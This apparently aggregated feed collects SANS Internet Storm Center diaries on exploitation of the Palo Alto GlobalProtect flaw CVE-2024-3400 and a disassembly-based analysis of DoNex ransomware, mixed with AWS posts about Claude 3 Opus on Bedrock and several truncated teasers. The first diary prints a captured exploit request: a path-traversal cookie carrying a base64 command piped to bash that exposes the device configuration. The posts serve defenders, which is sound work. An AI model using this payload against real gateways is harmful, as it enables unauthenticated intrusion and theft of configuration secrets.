Palo Alto Networks GlobalProtect exploit public and widely exploited CVE-2024-3400, (Tue, Apr 16th)

This post was originally published on this site

The Palo Alto Networks vulnerability has been analyzed in depth by various sources and exploits [1]. 

We have gotten several reports of exploits being attempted against GlobalProtect installs. In addition, we see scans for the GlobalProtect login page, but these scans predated the exploit. VPN gateways have always been the target of exploits like brute forcing or credential stuffing attacks.

GET /global-protect/login.esp HTTP/1.1
Host: [redacted]
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: /
Connection: keep-alive
Cookie: SESSID=.././.././.././.././.././.././.././.././../opt/panlogs/tmp/device_telemetry/minute/'}|{echo,Y3AgL29wdC9wYW5jZmcvbWdtdC9zYXZlZC1jb25maWdzL3J1bm5pbmctY29uZmlnLnhtbCAvdmFyL2FwcHdlYi9zc2x2cG5kb2NzL2dsb2JhbC1wcm90ZWN0L2Rrc2hka2Vpc3NpZGpleXVrZGwuY3Nz}|{base64,-d}|bash|{'

The exploit does exploit a path traversal vulnerability. The session ID ("SESSID" cookie) creates a file. This vulnerability can be used to create a file in a telemetry directory, and the content will be executed (see the Watchtwr blog for more details).

In this case, the code decoded to:

cp /opt/pancfg/mgmt/saved-configs/running-config.xml /var/appweb/sslvpndocs/global-protect/dkshdkeissidjeyukdl.css

Which will make the "running-config.xml" available for download without authentication. You may want to check the "/var/appweb/sslvpndocs/global-protect/" folder for similar files. I modified the random file name in case it was specific to the target from which we received this example.

 

 

[1] https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/
 


Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Anthropic’s Claude 3 Opus model is now available on Amazon Bedrock

This post was originally published on this site

We are living in the generative artificial intelligence (AI) era; a time of rapid innovation. When Anthropic announced its Claude 3 foundation models (FMs) on March 4, we made Claude 3 Sonnet, a model balanced between skills and speed, available on Amazon Bedrock the same day. On March 13, we launched the Claude 3 Haiku model on Amazon Bedrock, the fastest and most compact member of the Claude 3 family for near-instant responsiveness.

Today, we are announcing the availability of Anthropic’s Claude 3 Opus on Amazon Bedrock, the most intelligent Claude 3 model, with best-in-market performance on highly complex tasks. It can navigate open-ended prompts and sight-unseen scenarios with remarkable fluency and human-like understanding, leading the frontier of general intelligence.

With the availability of Claude 3 Opus on Amazon Bedrock, enterprises can build generative AI applications to automate tasks, generate revenue through user-facing applications, conduct complex financial forecasts, and accelerate research and development across various sectors. Like the rest of the Claude 3 family, Opus can process images and return text outputs.

Claude 3 Opus shows an estimated twofold gain in accuracy over Claude 2.1 on difficult open-ended questions, reducing the likelihood of faulty responses. As enterprise customers rely on Claude across industries like healthcare, finance, and legal research, improved accuracy is essential for safety and performance.

How does Claude 3 Opus perform?
Claude 3 Opus outperforms its peers on most of the common evaluation benchmarks for AI systems, including undergraduate-level expert knowledge (MMLU), graduate-level expert reasoning (GPQA), basic mathematics (GSM8K), and more. It exhibits high levels of comprehension and fluency on complex tasks, leading the frontier of general intelligence.


Source: https://www.anthropic.com/news/claude-3-family

Here are a few supported use cases for the Claude 3 Opus model:

  • Task automation: planning and execution of complex actions across APIs, databases, and interactive coding
  • Research: brainstorming and hypothesis generation, research review, and drug discovery
  • Strategy: advanced analysis of charts and graphs, financials and market trends, and forecasting

To learn more about Claude 3 Opus’s features and capabilities, visit Anthropic’s Claude on Bedrock page and Anthropic Claude models in the Amazon Bedrock documentation.

Claude 3 Opus in action
If you are new to using Anthropic models, go to the Amazon Bedrock console and choose Model access on the bottom left pane. Request access separately for Claude 3 Opus.

2024-claude3-opus-2-model-access screenshot

To test Claude 3 Opus in the console, choose Text or Chat under Playgrounds in the left menu pane. Then choose Select model and select Anthropic as the category and Claude 3 Opus as the model.

To test more Claude prompt examples, choose Load examples. You can view and run examples specific to Claude 3 Opus, such as analyzing a quarterly report, building a website, and creating a side-scrolling game.

By choosing View API request, you can also access the model using code examples in the AWS Command Line Interface (AWS CLI) and AWS SDKs. Here is a sample of the AWS CLI command:

aws bedrock-runtime invoke-model 
     --model-id anthropic.claude-3-opus-20240229-v1:0 
     --body "{"messages":[{"role":"user","content":[{"type":"text","text":" Your task is to create a one-page website for an online learning platform.n"}]}],"anthropic_version":"bedrock-2023-05-31","max_tokens":2000,"temperature":1,"top_k":250,"top_p":0.999,"stop_sequences":["nnHuman:"]}" 
     --cli-binary-format raw-in-base64-out 
     --region us-east-1 
     invoke-model-output.txt

As I mentioned in my previous Claude 3 model launch posts, you need to use the new Anthropic Claude Messages API format for some Claude 3 model features, such as image processing. If you use Anthropic Claude Text Completions API and want to use Claude 3 models, you should upgrade from the Text Completions API.

My colleagues, Dennis Traub and Francois Bouteruche, are building code examples for Amazon Bedrock using AWS SDKs. You can learn how to invoke Claude 3 on Amazon Bedrock to generate text or multimodal prompts for image analysis in the Amazon Bedrock documentation.

Here is sample JavaScript code to send a Messages API request to generate text:

// claude_opus.js - Invokes Anthropic Claude 3 Opus using the Messages API.
import {
  BedrockRuntimeClient,
  InvokeModelCommand
} from "@aws-sdk/client-bedrock-runtime";

const modelId = "anthropic.claude-3-opus-20240229-v1:0";
const prompt = "Hello Claude, how are you today?";

// Create a new Bedrock Runtime client instance
const client = new BedrockRuntimeClient({ region: "us-east-1" });

// Prepare the payload for the model
const payload = {
  anthropic_version: "bedrock-2023-05-31",
  max_tokens: 1000,
  messages: [{
    role: "user",
    content: [{ type: "text", text: prompt }]
  }]
};

// Invoke Claude with the payload and wait for the response
const command = new InvokeModelCommand({
  contentType: "application/json",
  body: JSON.stringify(payload),
  modelId
});
const apiResponse = await client.send(command);

// Decode and print Claude's response
const decodedResponseBody = new TextDecoder().decode(apiResponse.body);
const responseBody = JSON.parse(decodedResponseBody);
const text = responseBody.content[0].text;
console.log(`Response: ${text}`);

Now, you can install the AWS SDK for JavaScript Runtime Client for Node.js and run claude_opus.js.

npm install @aws-sdk/client-bedrock-runtime
node claude_opus.js

For more examples in different programming languages, check out the code examples section in the Amazon Bedrock User Guide, and learn how to use system prompts with Anthropic Claude at Community.aws.

Now available
Claude 3 Opus is available today in the US West (Oregon) Region; check the full Region list for future updates.

Give Claude 3 Opus a try in the Amazon Bedrock console today and send feedback to AWS re:Post for Amazon Bedrock or through your usual AWS Support contacts.

Channy

Rolling Back Packages on Ubuntu/Debian, (Tue, Apr 16th)

This post was originally published on this site

Package updates/upgrades by maintainers on the Linux platforms are always appreciated, as these updates are intended to offer new features/bug fixes. However, in rare circumstances, there is a need to downgrade the packages to a prior version due to unintended bugs or potential security issues, such as the recent xz-utils backdoor. Consistently backing up your data before significant updates is one good countermeasure against grief. However, what if one was not diligently practicing such measures and urgently needed to simply roll back to a prior version of the said package? I was recently put in this unenviable position when configuring one of my systems, and somehow, the latest version of Proton VPN (version 4.3.0) would not work and displayed the following output after I executed it:

Quick Palo Alto Networks Global Protect Vulnerablity Update (CVE-2024-3400), (Mon, Apr 15th)

This post was originally published on this site

This is a quick update to our initial diary from this weekend [CVE-2024-3400].

At this point, we are not aware of a public exploit for this vulnerability. The widely shared GitHub exploit is almost certainly fake.

As promised, Palo Alto delivered a hotfix for affected versions on Sunday (close to midnight Eastern Time). 

One of our readers, Mark, observed attacks attempting to exploit the vulnerability from two IP addresses:

%%ip:173.255.223.159%%: An Akamai/Linode IP address. We do not have any reports from this IP address. Shodan suggests that the system may have recently hosted a WordPress site.

%%ip:146.70.192.174%%: A system in Singapore that has been actively scanning various ports in March and April.

According to Mark, the countermeasure of disabling telemetry worked. The attacks where directed at various GlobalProtect installs, missing recently deployed instances. This could be due to the attacker using a slightly outdated target list.

Please let us know if you observe any additional attacks or if you come across exploits for this vulnerability. 


Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

AWS Weekly Roundup: New features on Knowledge Bases for Amazon Bedrock, OAC for Lambda function URL origins on Amazon CloudFront, and more (April 15, 2024)

This post was originally published on this site

AWS Community Days conferences are in full swing with AWS communities around the globe. The AWS Community Day Poland was hosted last week with more than 600 cloud enthusiasts in attendance. Community speakers Agnieszka Biernacka, Krzysztof Kąkol, and more, presented talks which captivated the audience and resulted in vibrant discussions throughout the day. My teammate, Wojtek Gawroński, was at the event and he’s already looking forward to attending again next year!

Last week’s launches
Here are some launches that got my attention during the previous week.

Amazon CloudFront now supports Origin Access Control (OAC) for Lambda function URL origins – Now you can protect your AWS Lambda URL origins by using Amazon CloudFront Origin Access Control (OAC) to only allow access from designated CloudFront distributions. The CloudFront Developer Guide has more details on how to get started using CloudFront OAC to authenticate access to Lambda function URLs from your designated CloudFront distributions.

AWS Client VPN and AWS Verified Access migration and interoperability patterns – If you’re using AWS Client VPN or a similar third-party VPN-based solution to provide secure access to your applications today, you’ll be pleased to know that you can now combine the use of AWS Client VPN and AWS Verified Access for your new or existing applications.

These two announcements related to Knowledge Bases for Amazon Bedrock caught my eye:

Metadata filtering to improve retrieval accuracy – With metadata filtering, you can retrieve not only semantically relevant chunks but a well-defined subset of those relevant chunks based on applied metadata filters and associated values.

Custom prompts for the RetrieveAndGenerate API and configuration of the maximum number of retrieved results – These are two new features which you can now choose as query options alongside the search type to give you control over the search results. These are retrieved from the vector store and passed to the Foundation Models for generating the answer.

For a full list of AWS announcements, be sure to keep an eye on the What’s New at AWS page.

Other AWS news
AWS open source news and updates – My colleague Ricardo writes this weekly open source newsletter in which he highlights new open source projects, tools, and demos from the AWS Community.

Upcoming AWS events
AWS Summits – These are free online and in-person events that bring the cloud computing community together to connect, collaborate, and learn about AWS. Whether you’re in the Americas, Asia Pacific & Japan, or EMEA region, learn here about future AWS Summit events happening in your area.

AWS Community Days – Join an AWS Community Day event just like the one I mentioned at the beginning of this post to participate in technical discussions, workshops, and hands-on labs led by expert AWS users and industry leaders from your area. If you’re in Kenya, or Nepal, there’s an event happening in your area this coming weekend.

You can browse all upcoming in-person and virtual events here.

That’s all for this week. Check back next Monday for another Weekly Roundup!

– Veliswa

This post is part of our Weekly Roundup series. Check back each week for a quick roundup of interesting news and announcements from AWS.

Critical Palo Alto GlobalProtect Vulnerability Exploited (CVE-2024-3400), (Sat, Apr 13th)

This post was originally published on this site

On Friday, Palo Alto Networks released an advisory warning users of Palo Alto's Global Protect product of a vulnerability that has been exploited since March [1].

Volexity discovered the vulnerability after one of its customers was compromised [2]. The vulnerability allows for arbitrary code execution. As of today, an exploit has been made public on GitHub. I have not had a chance to test if the exploit is real. I doubt it is real because I hope Palo Alto did apply a bit more due diligence to its products than let a trivial to exploit vulnerability slip in. On the other hand, we have seen similar vulnerabilities from security tool vendors before.

Assume Compromise

According to Volexity, exploit attempts for this vulnerability were observed as early as March 26th. A simple PoC is now publicly available.

Workarounds

GlobalProtect is only vulnerable if telemetry is enabled. Telemetry is enabled by default, but as a "quick fix", you may want to disable telemetry. Palo Alto Threat Prevention subscribers can enable Threat ID 95187 to block the exploit.

Patch

A patch should be available soon (it is not available as I am writing this). Check with Palo Alto for updates.

[1] https://security.paloaltonetworks.com/CVE-2024-3400
[2] https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400


Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Building a Live SIFT USB with Persistence, (Fri, Apr 12th)

This post was originally published on this site

The SIFT Workstation[1] is a well-known Linux distribution oriented to forensics and incident response tasks. It is used in many SANS training as the default platform. This is also my preferred solution for my day-to-day DFIR activities. The distribution is available as a virtual machine but you can install it on top of a classic Ubuntu system. Today, everything is virtualized and most DFIR activities can be performed remotely with the provided VM but… sometimes you still need a way to perform local investigations against a physical computer. That's why I always carry a USB stick with me. Before I was using Kali which provides a standard solution. 

Evolution of Artificial Intelligence Systems and Ensuring Trustworthiness, (Thu, Apr 11th)

This post was originally published on this site

We live in a dynamic age, especially with the increasing awareness and popularity of Artificial Intelligence (AI) systems being explored by users and organizations alike. I was recently quizzed by a junior researcher on how AI systems came about and realized I could not answer that query immediately. I had a rough idea of what led to the current generative and large language models. Still, I had a very fuzzy understanding of what transpired before them, besides being confident that neural networks were involved. Unsatisfied with the lack of appreciation of how AI systems evolved, I decided to explore how AI systems were conceptualized and developed to the current state, sharing what I learnt in this diary. However, knowing only how to use them but being unable to ensure their trustworthiness (especially if organizations want to use these systems for increasingly critical business activities) could expose organizations to a much higher risk than what senior leadership could accept. As such, I will also suggest some approaches (technical, governance, and philosophical) to ensure the trustworthiness of these AI systems.

Slicing up DoNex with Binary Ninja, (Thu, Apr 4th)

This post was originally published on this site

[This is a guest diary by John Moutos]

Intro

Ever since the LockBit source code leak back in mid-June 2022 [1], it is not surprising that newer ransomware groups have chosen to adopt a large amount of the LockBit code base into their own, given the success and efficiency that LockBit is notorious for. One of the more clear-cut spinoffs from LockBit, is Darkrace, a ransomware group that popped up mid-June 2023 [2], with samples that closely resembled binaries from the leaked LockBit builder, and followed a similar deployment routine. Unfortunately, Darkrace dropped off the radar after the administrators behind the LockBit clone decided to shut down their leak site.

It is unsurprising that, 8 months after the appearance and subsequent disappearance of the Darkrace group, a new group who call themselves DoNex [3], have appeared in their place, utilizing samples that closely resemble those previously used by the Darkrace group, and LockBit by proxy.

Analysis

Dropping the DoNex sample [4] in "Detect It Easy" (DIE) [5], we can see the binary does not appear to be packed, is 32-bit, and compiled with Microsoft's Visual C/C++ compiler.

Figure 1: Binary Opened in DIE

Opening the sample in Binary Ninja [6], and switching to the "Triage Summary" view, we can standard libraries being imported, and sections with nothing special going on.

Figure 2:  Binary Ninja Triage Summary

Switching back to the disassembly view, and going to the entry point, we can follow execution to the actual main function.

 

Figure 3: Entry Point

 

 

Figure 4: Call to Main Function

 

Once the application is launched, the main function starts by getting a handle to the attached console window with "FindWindowA", and setting the visibility to hidden by calling "ShowWindow" and passing "SW_HIDE" as a parameter.

Figure 5: Main Function

Following execution into the next function called (renamed to "doInit"), we can see a mutex check to ensure only one instance of the application will run and encrypt files.

Figure 6: Mutex Check

The next notable function called (renamed to "checkPrivs"), is an attempt to fetch the access token from the current thread by using "GetCurrentThread" with "OpenThreadToken", and in cases where this operation fails, "GetCurrentProcess" is used with "OpenProcessToken" to obtain the access token from the application process, instead of the current thread.

Figure 7: Get Access Token

Using the access token handle, "GetTokenInformation" is called to identify the user account information tied to the token, most notably the SID.

Figure 8: Get Token Info

The user account info will be used to check for administrative rights, so a SID for the administrators group is allocated and initialized.

Figure 9: Admin SID Create

Now with the SID for the administrators group, "EqualSid" is called to compare the SID from derived from the token information against the newly initialized SID for the administrators group

Figure 10: Admin Context Check

Returning back to the main function, next "GetModuleHandleA" is used to open a handle to "kernel32.dll" module, and "GetProcAddress" is called using that handle to resolve the address of the "IsWow64Process" function.

Figure 11: Dynamic Address Resolution

Using the now resolved "IsWow64Process" function, the handle of the current process is passed and used to determine if "Windows on Windows 64" (WOW64 is essentially an x86 emulator) is being used to run the application. WOW64 file system redirection is then disabled if the application is either running under 32-bit Windows, or if it is running under WOW64 on 64-bit Windows. Disabling redirection allows 32-bit applications running under WOW to access 64-bit versions of system files in the System32 directory, instead of being redirected to the 32-bit directory counterpart, SysWOW64.

Figure 12: WOW FS Redirection Check

From the main function we follow another call to the function (renamed to "doCryptoSetup") responsible for acquiring the cryptographic context needed for the application to actually encrypt device files by calling, as the name implies "CryptAcquireContextA".

Figure 13: Acquire Crypot Context

With the cryptographic context setup, the following function (renamed to "setIcon") called, is used to drop an icon file named "icon.ico" to "C:ProgramData", and create keys in the device registry through use of "RegCreateKeyExA", and "RegSetValueExA", to set it as the default file icon for newly encrypted files.

 

Figure 14: Drop Icon File

 

 

Figure 15: Associate Icon with Extension

 

 

Figure 16: Set Default Icon in Registry

 

The final part of the initial setup process involves a call to "SHEmptyRecycleBinA", which as the name implies, empties the recycle bin, and since no drive was specified, it will affect all the device drives.

 

Figure 17: Wiping Recycle Bins

 

With the main pre-encryption setup complete, the encryption setup function (renamed to "mainEncryptSetup") which handles thread management, process termination, service control, drive & network share enumeration, file discovery & iteration, and encryption is called.

 

Figure 18: Encryption Setup Start

 

As part of the process termination and service control component, a connection to the service control manager on the local device is established through a call to "getServiceControl".

 

Figure 19: Service Control Connection

 

The first thread created during the encryption setup, is used to drop the process terminating batch file ("1.bat") [7] to the "ProgramData" directory. The second thread that is created, handles service manipulation, and executes if a valid handle to the service control manager is present.

 

Figure 20: Thread Creation

 

Called by the creation of the first thread, this function (renamed to "batRun") drops a looping batch file ("1.bat"), and executes it with "WinExec", which pings the localhost address, and uses "taskkill" to kill processes of common AV & EDR products and backup software.

 

Figure 21: Process Kill Batch

 

Called by the creation of the second thread, this function (renamed to "stopServices"), creates a connection to the service control manager through a call to "OpenSCManagerA", and has the capability to open handles to a service based on a service name, using "OpenServiceA", identify the service status with "QueryServiceStatusEx", identify any dependent services with "EnumDependentServicesA", and make modifications to the service, such as stopping it, with "ControlService".

 

 

Figure 22: Service Control Connection

 

 

Figure 23: Dependent Service Check

 

 

Figure 24: Control Service

After the previous two threads have finished, a list of valid storage drives connected to the device is enumerated with "GetLogicalDriveStringsW" and the drive type for each is queried using "GetDriveTypeW".

 

Figure 25: Storage Enumeration

 

The third and fourth threads will call functions "iterFiles" and "iterFilesCon", which handle discovering and iterating through the files on the previously queried drives. The fifth thread starts the actual file encryption process with a call to "startEncrypt".

 

Figure 26: Start Iterating Files

 

To start the process of iterating through files, the root path of the current targeted drive is identified using “getDriveRootPath”.

 

Figure 27: Get Drive Root

 

Files are then iterated through using “FindFirstFileW” and “FindNextFileW”, and checked against a file blacklist (“checkFileBlacklist”) to avoid encrypting critical system files, before being stored in a list to be used in the encryption process.

 

Figure 28: Start File Iteration

 

 

Figure 29: Compare Files to Blacklist

 

 

Figure 30: Release Handle and Finish Iteration

 

The encryption process starts with the execution of the “encryptJob” function, by the creation of the fifth thread

 

Figure 31: Start File Encryption Job

 

To ensure the encrypted data can be written to the target files, a Restart Manager session is created with “RmStartSession” and populated with the target files (resources) using “RmRegisterResources”, which are then collected by “RmGetList” and used to check if the target files are locked by any other processes, and if a lock exists, a handle is opened to the process, and the process is terminated, using “OpenProcess” and “TerminateProcess”. The target files are then finally encrypted.

 

Figure 32: Check File Locks

 

With the main encryption job finished, the ransom note “ReadMe” is dropped.

 

Figure 33: Dropping Ransom Note

 

 

Figure 34: Note Name with ID Placeholder

 

 

Figure 35: Note Written to Disk

 

With the main on-disk encryption job complete, available network shares are targeted next.

 

Figure 36: Target Network Shares

 

Network shares are enumerated through use of the Windows Networking API (“WNetOpenEnumW”), and connections are made to shares that are accessible by the current acting user account (“WNetEnumResourceW” and “WNetAddConnection2W”)

 

Figure 37: Start Network Share Enum Job

 

 

Figure 38: Continue Enum Job

 

 

Figure 39: Network Share Connection Attempt

 

Similar to the previous process, files on the network share(s) are then discovered and iterated through (“FindFirstFileW” and “FindNextFileW”), to be stored and used by the network share file encrypt job.

 

Figure 40: Network Share File Iteration

 

With the network share files discovered and stored, the encryption job (“encryptJobNS”) for them is started.

 

Figure 41: Encrypt Network Share Files

 

Lastly, to cleanup, the application, system, and security event logs are erased (“OpenEventLogA” and “ClearEventLogA”), and a command which pings the localhost address, before deleting the dropped “1.bat” file, and performing a hard restart on the device, is invoked with “WinExec”, before exiting.

 

Figure 42: Clear Event Logs

 

 

Figure 43: Cleanup Commands

 

 

Figure 44: Execute Cleanup Commands

 

Additional data extracted during runtime, and similar LockBit/Darkrace files for comparison.

 

Figure 45: DoNex Ransom Note

 

 

Figure 46: "1.bat" [50] Contents

 

 

Figure 47: Commands User to Delete Shadow Copies

 

 

Figure 48: Darkrace Rasnom Note
Figure 49: LockBit 3.0 Ransom Note

 

Flow Summary

  • User or threat actor executes DoNex ransomware binary
  • Binary starts and hides attached console window
  • Performs a mutex check to ensure only one instance of the binary is running
  • Obtains the access token from the current thread, or process
  • Queries user account info associated with the token
  • Checks if user account belongs to local administrators group
  • Disables WOW file system redirection if running under 32-bit Windows, or WOW64 on 64-bit Windows
  • Drops an icon file in "ProgramData"
  • Sets dropped icon as default file icon for encrypted files
  • Wipes recycle bins on all drives
  • Drops "1.bat" batch file to "ProgramData" and executes it
  • Enumerates connected drives
  • Identifies root path on each drive
  • Iterates through files on drives
  • Checks files against blacklist
  • Checks if target files are locked and if true, kill locking process(es)
  • Encrypts files on disk
  • Drops ransom note "ReadMe.txt"
  • Enumerates accessible network shares
  • Attempts to connect to any open shares
  • Iterates through files on shares
  • Encrypts files on network shares
  • Clears application, security, and system event logs
  • Deletes "1.bat" file
  • Forces a hard restart on the device

Takeaway

Unsurprisingly, the threat actors behind the DoNex group are far from innovators in the ransomware landscape, with nothing new brought to the table, outside of renaming some strings within the LockBit builder. DoNex, and the Darkrace ransomware gang are merely trying to shortcut their way to successful compromises, using the scraps left behind by LockBit and the leaked builder. The appearance of these smaller and newer groups will only become more common, as the skill ceiling for successful compromise is pushed down lower, partially due to the affiliate programs larger ransomware families have in place, and the beginner friendly builders, that are directly provided, or in the case of LockBit, leaked.

References, Appendix, & Tools Used

[1] https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-165a
[2] https://cyble.com/blog/unmasking-the-darkrace-ransomware-gang
[3] https://www.watchguard.com/wgrd-security-hub/ransomware-tracker/donex
[4] https://www.virustotal.com/gui/file/6d6134adfdf16c8ed9513aba40845b15bd314e085ef1d6bd20040afd42e36e40
[5] https://github.com/horsicq/DIE-engine/releases
[6] https://binary.ninja
[7] https://www.virustotal.com/gui/file/2b15e09b98bc2835a4430c4560d3f5b25011141c9efa4331f66e9a707e2a23c0

Indicators of Compromise

SHA-256 Hashes:
6d6134adfdf16c8ed9513aba40845b15bd314e085ef1d6bd20040afd42e36e40 (doneX.exe)
2b15e09b98bc2835a4430c4560d3f5b25011141c9efa4331f66e9a707e2a23c0 (1.bat)
d3997576cb911671279f9723b1c9505a572e1c931d39fe6e579b47ed58582731 (icon.ico)

Notable File Activity:
C:UsersuserDesktopReadMe.f58A66B51.txt
C:UsersuserDownloadsReadMe.f58A66B51.txt
C:UsersuserDocumentsReadMe.f58A66B51.txt
C:ReadMe.f58A66B51.txt
C:TempReadMe.f58A66B51.txt

Notable Registry Activity:
HKEY_CLASSES_ROOT.f58A66B51
HKEY_CLASSES_ROOTf58A66B51fileDefaultIcon
HKEY_LOCAL_MACHINESOFTWAREClassesf58A66B51fileDefaultIcon
HKEY_LOCAL_MACHINESOFTWAREClasses.f58A66B51

John Moutos

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.